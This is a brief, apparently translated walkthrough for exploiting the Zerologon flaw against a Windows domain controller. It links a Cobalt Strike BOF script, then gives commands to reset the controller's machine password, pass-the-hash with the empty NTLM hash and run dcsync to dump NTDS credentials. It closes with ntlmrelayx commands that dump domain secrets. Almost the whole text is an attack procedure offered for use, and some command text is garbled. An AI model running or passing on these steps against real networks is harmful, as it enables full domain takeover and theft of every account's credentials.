Download the script here https://github.com/rsmudge/ZeroLogon-BOF

ZeroLogon-BOF / dist / zerologon.cna A new command should appear in the console - zerologon

Application: net domain - get the domain name (for example domain.local ) We launch the exploit : zerologon iunderstand domain.local iunderstand is a stop word. By exploiting this vulnerability, we reset the password. This exploit can cause the domain controller to malfunction.

If successful, we get: Success! Use pth. \\% S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync We do everything as written. we carry out pth. \\% S 31d6cfe0d16ae931b73c59d7e0c089c0 And we carry out dcsync domain.local If everything worked out successfully, we get NTDS

# target vulnerable to Zerologon, dump DC's secrets only
ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER'

# target vulnerable to Zerologon, dump Domain's secrets
ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER' -auth-smb 'DOMAIN'/'LOW_PRIV_USER':'PASSWORD'